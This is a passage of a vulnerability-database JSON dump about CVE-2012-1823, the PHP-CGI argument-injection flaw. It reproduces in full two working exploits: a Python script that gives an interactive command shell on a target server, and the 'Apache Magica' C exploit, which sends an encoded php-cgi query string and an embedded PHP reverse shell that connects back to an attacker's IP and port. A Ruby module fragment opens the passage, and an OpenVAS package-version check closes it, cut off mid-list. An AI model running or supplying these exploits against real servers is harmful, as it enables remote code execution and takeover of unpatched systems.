::OpenSSL::SSL::SSLError\r\n\t\t\tprint_error(&#34;The target failed to negotiate SSL, is this really an SSL service?&#34;)\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef rand_php_ini_false\r\n\t\tRex::Text.to_rand_case([ &#34;0&#34;, &#34;off&#34;, &#34;false&#34; ][rand(3)])\r\n\tend\r\n\r\n\tdef rand_php_ini_true\r\n\t\tRex::Text.to_rand_case([ &#34;1&#34;, &#34;on&#34;, &#34;true&#34; ][rand(3)])\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72859"}, {"lastseen": "2017-11-19T17:47:53", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2012-12-25T00:00:00", "published": "2012-12-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60536", "id": "SSV:60536", "title": "PHP-CGI Argument Injection Remote Code Execution", "type": "seebug", "sourceData": "\n #!/usr/bin/python\r\nimport requests\r\nimport sys\r\n\r\nprint &quot;&quot;&quot;\r\nCVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution\r\nThis exploit abuses an arguement injection in the PHP-CGI wrapper\r\nto execute code as the PHP user/webserver user.\r\nFeel free to give me abuse about this &lt;3\r\n- infodox | insecurety.net | @info_dox\r\n&quot;&quot;&quot;\r\n\r\nif len(sys.argv) != 2:\r\n print &quot;Usage: ./cve-2012-1823.py &lt;target&gt;&quot;\r\n sys.exit(0)\r\n\r\ntarget = sys.argv[1]\r\nurl = &quot;&quot;&quot;http://&quot;&quot;&quot; + target + &quot;&quot;&quot;/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input&quot;&quot;&quot;\r\nlol = &quot;&quot;&quot;&lt;?php system('&quot;&quot;&quot;\r\nlol2 = &quot;&quot;&quot;');die(); ?&gt;&quot;&quot;&quot;\r\nprint &quot;[+] Connecting and spawning a shell...&quot;\r\nwhile True:\r\n try:\r\n bobcat = raw_input(&quot;%s:~$ &quot; %(target))\r\n lulz = lol + bobcat + lol2\r\n hax = requests.post(url, lulz)\r\n print hax.text\r\n except KeyboardInterrupt:\r\n print &quot;\\n[-] Quitting&quot;\r\n sys.exit(1)\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60536"}, {"lastseen": "2017-11-19T17:39:53", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2013-10-31T00:00:00", "published": "2013-10-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61070", "id": "SSV:61070", "type": "seebug", "title": "Apache / PHP 5.x Remote Code Execution Exploit", "sourceData": "\n /* Apache Magica by Kingcope */\r\n/* gcc apache-magika.c -o apache-magika -lssl */\r\n/* This is a code execution bug in the combination of Apache and PHP.\r\nOn Debian and Ubuntu the vulnerability is present in the default install\r\nof the php5-cgi package. When the php5-cgi package is installed on Debian and\r\nUbuntu or php-cgi is installed manually the php-cgi binary is accessible under\r\n/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute\r\nthe binary because this binary has a security check enabled when installed with\r\nApache http server and this security check is circumvented by the exploit.\r\nWhen accessing the php-cgi binary the security check will block the request and\r\nwill not execute the binary.\r\nIn the source code file sapi/cgi/cgi_main.c of PHP we can see that the security\r\ncheck is done when the php.ini configuration setting cgi.force_redirect is set\r\nand the php.ini configuration setting cgi.redirect_status_env is set to no.\r\nThis makes it possible to execute the binary bypassing the Security check by\r\nsetting these two php.ini settings.\r\nPrior to this code for the Security check getopt is called and it is possible\r\nto set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the\r\n-d switch. If both values are set to zero and the request is sent to the server\r\nphp-cgi gets fully executed and we can use the payload in the POST data field\r\nto execute arbitrary php and therefore we can execute programs on the system.\r\napache-magika.c is an exploit that does exactly the prior described. It does\r\nsupport SSL.\r\n/* Affected and tested versions\r\nPHP 5.3.10\r\nPHP 5.3.8-1\r\nPHP 5.3.6-13\r\nPHP 5.3.3\r\nPHP 5.2.17\r\nPHP 5.2.11\r\nPHP 5.2.6-3\r\nPHP 5.2.6+lenny16 with Suhosin-Patch\r\nAffected versions\r\nPHP prior to 5.3.12\r\nPHP prior to 5.4.2\r\nUnaffected versions\r\nPHP 4 - getopt parser unexploitable\r\nPHP 5.3.12 and up\r\nPHP 5.4.2 and up\r\nUnaffected versions are patched by CVE-2012-1823.\r\n*/\r\n/* .\r\n /'\\rrq rk\r\n . // \\\\ .\r\n.x.//fco\\\\-|-\r\n '//cmtco\\\\zt\r\n //6meqrg.\\\\tq\r\n//_________\\\\'\r\nEJPGQO\r\napache-magica.c by Kingcope\r\n*/\r\n\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;unistd.h&gt;\r\n#include &lt;getopt.h&gt;\r\n#include &lt;sys/types.h&gt;\r\n#include &lt;stddef.h&gt;\r\n#include &lt;openssl/rand.h&gt;\r\n#include &lt;openssl/ssl.h&gt;\r\n#include &lt;openssl/err.h&gt;\r\n#include &lt;netdb.h&gt;\r\n#include &lt;sys/socket.h&gt;\r\n#include &lt;netinet/in.h&gt;\r\n\r\ntypedef struct {\r\n\tint sockfd;\r\n\tSSL *handle;\r\n\tSSL_CTX *ctx;\r\n} connection;\r\n\r\nvoid usage(char *argv[])\r\n{\r\n printf(&quot;usage: %s &lt;--target target&gt; &lt;--port port&gt; &lt;--protocol http|https&gt; &quot; \\\r\n &quot;&lt;--reverse-ip ip&gt; &lt;--reverse-port port&gt; [--force-interpreter interpreter]\\n&quot;,\r\n argv[0]);\r\n exit(1);\r\n}\r\n\r\nchar poststr[] = &quot;POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F&quot; \\\r\n &quot;%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64&quot; \\\r\n &quot;+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73&quot; \\\r\n &quot;%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E&quot; \\\r\n &quot;%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63&quot; \\\r\n &quot;%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62&quot; \\\r\n &quot;%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74&quot; \\\r\n &quot;%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68&quot; \\\r\n &quot;%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F&quot; \\\r\n &quot;%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63&quot; \\\r\n &quot;%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73&quot; \\\r\n &quot;%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\\r\\n&quot; \\\r\n &quot;Host: %s\\r\\n&quot; \\\r\n &quot;User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26&quot; \\\r\n &quot;(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\\r\\n&quot; \\\r\n &quot;Content-Type: application/x-www-form-urlencoded\\r\\n&quot; \\\r\n &quot;Content-Length: %d\\r\\n&quot; \\\r\n &quot;Connection: close\\r\\n\\r\\n%s&quot;;\r\nchar phpstr[] = &quot;&lt;?php\\n&quot; \\\r\n&quot;set_time_limit(0);\\n&quot; \\\r\n&quot;$ip = '%s';\\n&quot; \\\r\n&quot;$port = %d;\\n&quot; \\\r\n&quot;$chunk_size = 1400;\\n&quot; \\\r\n&quot;$write_a = null;\\n&quot; \\\r\n&quot;$error_a = null;\\n&quot; \\\r\n&quot;$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\\n&quot; \\\r\n&quot;$daemon = 0;\\n&quot; \\\r\n&quot;$debug = 0;\\n&quot; \\\r\n&quot;if (function_exists('pcntl_fork')) {\\n&quot; \\\r\n&quot;\t$pid = pcntl_fork();\t\\n&quot; \\\r\n&quot;\tif ($pid == -1) {\\n&quot; \\\r\n&quot;\t\tprintit(\\&quot;ERROR: Can't fork\\&quot;);\\n&quot; \\\r\n&quot;\t\texit(1);\\n&quot; \\\r\n&quot;\t}\\n&quot; \\\r\n&quot;\tif ($pid) {\\n&quot; \\\r\n&quot;\t\texit(0);\\n&quot; \\\r\n&quot;\t}\\n&quot; \\\r\n&quot;\tif (posix_setsid() == -1) {\\n&quot; \\\r\n&quot;\t\tprintit(\\&quot;Error: Can't setsid()\\&quot;);\\n&quot; \\\r\n&quot;\t\texit(1);\\n&quot; \\\r\n&quot;\t}\\n&quot; \\\r\n&quot;\t$daemon = 1;\\n&quot; \\\r\n&quot;} else {\\n&quot; \\\r\n&quot;\tprintit(\\&quot;WARNING: Failed to daemonise.\\&quot;);\\n&quot; \\\r\n&quot;}\\n&quot; \\\r\n&quot;chdir(\\&quot;/\\&quot;);\\n&quot; \\\r\n&quot;umask(0);\\n&quot; \\\r\n&quot;$sock = fsockopen($ip, $port, $errno, $errstr, 30);\\n&quot; \\\r\n&quot;if (!$sock) {\\n&quot; \\\r\n&quot;\tprintit(\\&quot;$errstr ($errno)\\&quot;);\\n&quot; \\\r\n&quot;\texit(1);\\n&quot; \\\r\n&quot;}\\n&quot; \\\r\n&quot;$descriptorspec = array(\\n&quot; \\\r\n&quot; 0 =&gt; array(\\&quot;pipe\\&quot;, \\&quot;r\\&quot;),\\n&quot; \\\r\n&quot; 1 =&gt; array(\\&quot;pipe\\&quot;, \\&quot;w\\&quot;),\\n&quot; \\\r\n&quot; 2 =&gt; array(\\&quot;pipe\\&quot;, \\&quot;w\\&quot;)\\n&quot; \\\r\n&quot;);\\n&quot; \\\r\n&quot;$process = proc_open($shell, $descriptorspec, $pipes);\\n&quot; \\\r\n&quot;if (!is_resource($process)) {\\n&quot; \\\r\n&quot;\tprintit(\\&quot;ERROR: Can't spawn shell\\&quot;);\\n&quot; \\\r\n&quot;\texit(1);\\n&quot; \\\r\n&quot;}\\n&quot; \\\r\n&quot;stream_set_blocking($pipes[0], 0);\\n&quot; \\\r\n&quot;stream_set_blocking($pipes[1], 0);\\n&quot; \\\r\n&quot;stream_set_blocking($pipes[2], 0);\\n&quot; \\\r\n&quot;stream_set_blocking($sock, 0);\\n&quot; \\\r\n&quot;while (1) {\\n&quot; \\\r\n&quot;\tif (feof($sock)) {\\n&quot; \\\r\n&quot;\t\tprintit(\\&quot;ERROR: Shell connection terminated\\&quot;);\\n&quot; \\\r\n&quot;\t\tbreak;\\n&quot; \\\r\n&quot;\t}\\n&quot; \\\r\n&quot;\tif (feof($pipes[1])) {\\n&quot; \\\r\n&quot;\t\tprintit(\\&quot;ERROR: Shell process terminated\\&quot;);\\n&quot; \\\r\n&quot;\t\tbreak;\\n&quot; \\\r\n&quot;\t}\\n&quot; \\\r\n&quot;\t$read_a = array($sock, $pipes[1], $pipes[2]);\\n&quot; \\\r\n&quot;\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\\n&quot; \\\r\n&quot;\tif (in_array($sock, $read_a)) {\\n&quot; \\\r\n&quot;\t\tif ($debug) printit(\\&quot;SOCK READ\\&quot;);\\n&quot; \\\r\n&quot;\t\t$input = fread($sock, $chunk_size);\\n&quot; \\\r\n&quot;\t\tif ($debug) printit(\\&quot;SOCK: $input\\&quot;);\\n&quot; \\\r\n&quot;\t\tfwrite($pipes[0], $input);\\n&quot; \\\r\n&quot;\t}\\n&quot; \\\r\n&quot;\tif (in_array($pipes[1], $read_a)) {\\n&quot; \\\r\n&quot;\t\tif ($debug) printit(\\&quot;STDOUT READ\\&quot;);\\n&quot; \\\r\n&quot;\t\t$input = fread($pipes[1], $chunk_size);\\n&quot; \\\r\n&quot;\t\tif ($debug) printit(\\&quot;STDOUT: $input\\&quot;);\\n&quot; \\\r\n&quot;\t\tfwrite($sock, $input);\\n&quot; \\\r\n&quot;\t}\\n&quot; \\\r\n&quot;\tif (in_array($pipes[2], $read_a)) {\\n&quot; \\\r\n&quot;\t\tif ($debug) printit(\\&quot;STDERR READ\\&quot;);\\n&quot; \\\r\n&quot;\t\t$input = fread($pipes[2], $chunk_size);\\n&quot; \\\r\n&quot;\t\tif ($debug) printit(\\&quot;STDERR: $input\\&quot;);\\n&quot; \\\r\n&quot;\t\tfwrite($sock, $input);\\n&quot; \\\r\n&quot;\t}\\n&quot; \\\r\n&quot;}\\n&quot; \\\r\n&quot;\\n&quot; \\\r\n&quot;fclose($sock);\\n&quot; \\\r\n&quot;fclose($pipes[0]);\\n&quot; \\\r\n&quot;fclose($pipes[1]);\\n&quot; \\\r\n&quot;fclose($pipes[2]);\\n&quot; \\\r\n&quot;proc_close($process);\\n&quot; \\\r\n&quot;function printit ($string) {\\n&quot; \\\r\n&quot;\tif (!$daemon) {\\n&quot; \\\r\n&quot;\t\tprint \\&quot;$string\\n\\&quot;;\\n&quot; \\\r\n&quot;\t}\\n&quot; \\\r\n&quot;}\\n&quot; \\\r\n&quot;exit(1);\\n&quot; \\\r\n&quot;?&gt;&quot;;\r\n\r\nstruct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)\r\n{\r\n struct hostent *he;\r\n struct sockaddr_in server, *servercopy;\r\n \r\n if ((he=gethostbyname(hostname)) == NULL) {\r\n printf(&quot;Hostname cannot be resolved\\n&quot;);\r\n exit(255);\r\n }\r\n \r\n servercopy = malloc(sizeof(struct sockaddr_in));\r\n if (!servercopy) {\r\n\tprintf(&quot;malloc error (1)\\n&quot;);\r\n\texit(255);\r\n }\r\n memset(&amp;server, '\\0', sizeof(struct sockaddr_in));\r\n memcpy(&amp;server.sin_addr, he-&gt;h_addr_list[0], he-&gt;h_length);\r\n server.sin_family = AF_INET;\r\n server.sin_port = htons(port);\r\n memcpy(servercopy, &amp;server, sizeof(struct sockaddr_in));\r\n return servercopy;\r\n}\r\n\r\nchar *sslread(connection *c)\r\n{\r\n char *rc = NULL;\r\n int received, count = 0, count2=0;\r\n char ch;\r\n\r\n for(;;)\r\n {\r\n if (!rc)\r\n rc = calloc(1024, sizeof (char) + 1);\r\n else\r\n if (count2 % 1024 == 0) {\r\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\r\n }\r\n received = SSL_read(c-&gt;handle, &amp;ch, 1);\r\n if (received == 1) {\r\n rc[count++] = ch;\r\n count2++;\r\n if (count2 &gt; 1024*5)\r\n\t break;\r\n }\r\n else\r\n break;\r\n }\r\n return rc;\r\n}\r\n\r\nchar *read_(int sockfd)\r\n{\r\n char *rc = NULL;\r\n int received, count = 0, count2=0;\r\n char ch;\r\n\r\n for(;;)\r\n {\r\n if (!rc)\r\n rc = calloc(1024, sizeof (char) + 1);\r\n else\r\n if (count2 % 1024 == 0) {\r\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\r\n }\r\n received = read(sockfd, &amp;ch, 1);\r\n if (received == 1) {\r\n rc[count++] = ch;\r\n count2++;\r\n if (count2 &gt; 1024*5)\r\n\t break;\r\n }\r\n else\r\n break;\r\n }\r\n return rc;\r\n}\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,\r\n *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;\r\n char httpsflag=0;\r\n unsigned short port=0, reverseport=0;\r\n struct sockaddr_in *server;\r\n int sockfd;\r\n unsigned int writesize, tmpsize;\r\n unsigned int i;\r\n connection *sslconnection;\r\n printf(&quot;-== Apache Magika by Kingcope ==-\\n&quot;);\r\n for(;;)\r\n {\r\n\t int c;\r\n int option_index=0;\r\n static struct option long_options[] = {\r\n\t {&quot;target&quot;, required_argument, 0, 0 },\r\n\t {&quot;port&quot;, required_argument, 0, 0 },\r\n\t {&quot;protocol&quot;, required_argument, 0, 0 },\r\n\t {&quot;reverse-ip&quot;, required_argument, 0, 0 },\r\n\t {&quot;reverse-port&quot;, required_argument, 0, 0 },\r\n\t {&quot;force-interpreter&quot;, required_argument, 0, 0 },\t \r\n\t {0, 0, 0, 0 }\r\n\t };\r\n\t \r\n\t c = getopt_long(argc, argv, &quot;&quot;, long_options, &amp;option_index);\r\n if (c &lt; 0)\r\n \tbreak;\r\n \r\n switch (c) {\r\n\t case 0:\r\n\t switch (option_index) {\r\n\t case 0:\r\n\t if (optarg) {\r\n\t target = calloc(strlen(optarg)+1, sizeof(char));\r\n\t if (!target) {\r\n\t\t printf(&quot;calloc error (2)\\n&quot;);\r\n\t exit(255);\r\n }\r\n\t memcpy(target, optarg, strlen(optarg)+1);\r\n \t}\r\n break;\r\n case 1:\r\n if(optarg)\r\n\t port = atoi(optarg);\r\n break;\r\n case 2:\r\n protocol = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!protocol) {\r\n\t printf(&quot;calloc error (3)\\n&quot;);\r\n exit(255);\r\n }\r\n memcpy(protocol, optarg, strlen(optarg)+1);\r\n if (!strcmp(protocol, &quot;https&quot;))\r\n httpsflag=1;\r\n break;\r\n case 3:\r\n reverseip = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!reverseip) {\r\n\t printf(&quot;calloc error (4)\\n&quot;);\r\n exit(255);\r\n }\r\n memcpy(reverseip, optarg, strlen(optarg)+1); \r\n break;\r\n case 4:\r\n\t reverseport = atoi(optarg); \r\n\t\treverseportstr = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!reverseportstr) {\r\n\t printf(&quot;calloc error (5)\\n&quot;);\r\n exit(255);\r\n }\r\n memcpy(reverseportstr, optarg, strlen(optarg)+1); \t \r\n break;\r\n case 5:\r\n forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!forceinterpreter) {\r\n\t printf(&quot;calloc error (6)\\n&quot;);\r\n exit(255);\r\n }\r\n memcpy(forceinterpreter, optarg, strlen(optarg)+1); \r\n break;\r\n default:\r\n usage(argv);\r\n\t }\r\n\t break;\r\n\t \r\n\t default:\r\n\t usage(argv);\r\n }\r\n }\r\n\r\n if ((optind &lt; argc) || !target || !protocol || !port ||\r\n !reverseip || !reverseport){\r\n\tusage(argv);\r\n }\r\n \r\n server = gethostbyname_(target, port);\r\n if (!server) {\r\n printf(&quot;Error while resolving hostname. (7)\\n&quot;);\r\n exit(255);\r\n }\r\n\r\n char *interpreters[5];\r\n int ninterpreters = 5;\r\n interpreters[0] = strdup(&quot;/cgi-bin/php&quot;);\r\n interpreters[1] = strdup(&quot;/cgi-bin/php5&quot;);\r\n interpreters[2] = strdup(&quot;/cgi-bin/php-cgi&quot;);\r\n interpreters[3] = strdup(&quot;/cgi-bin/php.cgi&quot;);\r\n interpreters[4] = strdup(&quot;/cgi-bin/php4&quot;);\r\n \r\n for (i=0;i&lt;ninterpreters;i++) {\r\n interpreter = interpreters[i];\r\n if (forceinterpreter) {\r\n interpreter = strdup(forceinterpreter);\r\n }\r\n if (forceinterpreter &amp;&amp; i)\r\n break;\r\n printf(&quot;%s\\n&quot;, interpreter);\r\n \r\n sockfd = socket(AF_INET, SOCK_STREAM, 0);\r\n if (sockfd &lt; 1) { \r\n\t printf(&quot;socket error (8)\\n&quot;);\r\n\t exit(255);\r\n }\r\n \r\n if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) &lt; 0) {\r\n printf(&quot;connect error (9)\\n&quot;);\r\n exit(255);\t \r\n }\r\n if (httpsflag) {\r\n sslconnection = (connection*) malloc(sizeof(connection));\r\n if (!sslconnection) {\r\n printf(&quot;malloc error (10)\\n&quot;);\r\n exit(255); \r\n }\r\n sslconnection-&gt;handle = NULL;\r\n sslconnection-&gt;ctx = NULL;\r\n\r\n SSL_library_init();\r\n\r\n sslconnection-&gt;ctx = SSL_CTX_new(SSLv23_client_method());\r\n if (!sslconnection-&gt;ctx) {\r\n \t printf(&quot;SSL_CTX_new error (11)\\n&quot;);\r\n exit(255);\r\n }\r\n\r\n sslconnection-&gt;handle = SSL_new(sslconnection-&gt;ctx);\r\n if (!sslconnection-&gt;handle) {\r\n \t printf(&quot;SSL_new error (12)\\n&quot;);\r\n\t exit(255); \r\n }\r\n if (!SSL_set_fd(sslconnection-&gt;handle, sockfd)) {\r\n \t printf(&quot;SSL_set_fd error (13)\\n&quot;);\r\n exit(255);\r\n }\r\n \r\n if (SSL_connect(sslconnection-&gt;handle) != 1) {\r\n\t printf(&quot;SSL_connect error (14)\\n&quot;);\r\n exit(255); \r\n }\r\n }\r\n \r\n tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64;\r\n tmpstr = (char*)calloc(tmpsize, sizeof(char));\r\n snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);\r\n \r\n writesize = strlen(target) + strlen(interpreter) + \r\n strlen(poststr) + strlen(tmpstr) + 64;\r\n writestr = (char*)calloc(writesize, sizeof(char));\r\n snprintf(writestr, writesize, poststr, interpreter,\r\n target, strlen(tmpstr), tmpstr);\r\n \r\n if (!httpsflag) {\r\n\t write(sockfd, writestr, strlen(writestr));\r\n\t readbuf = read_(sockfd);\r\n } else {\r\n\t SSL_write(sslconnection-&gt;handle, writestr, strlen(writestr));\r\n\t readbuf = sslread(sslconnection);\r\n }\r\n \r\n if (readbuf) {\r\n printf(&quot;***SERVER RESPONSE***\\n\\n%s\\n\\n&quot;, readbuf); \r\n } else {\r\n printf(&quot;read error (15)\\n&quot;);\r\n exit(255);\t \r\n }\r\n }\r\n exit(1);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61070", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-03-17T23:03:03", "bulletinFamily": "scanner", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120147", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120147", "title": "Amazon Linux: Security Advisory (ALAS-2012-77)", "type": "openvas", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120147\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:18:35 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-77)\");\n script_tag(name:\"insight\", value:\"A flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter. (CVE-2012-1823 )\");\n script_tag(name:\"solution\", value:\"Run yum update php to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-77.html\");\n script_cve_id(\"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-fpm\", rpm:\"php-fpm~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-embedded\", rpm:\"php-embedded~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.3.13~1.20.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mysqlnd\", 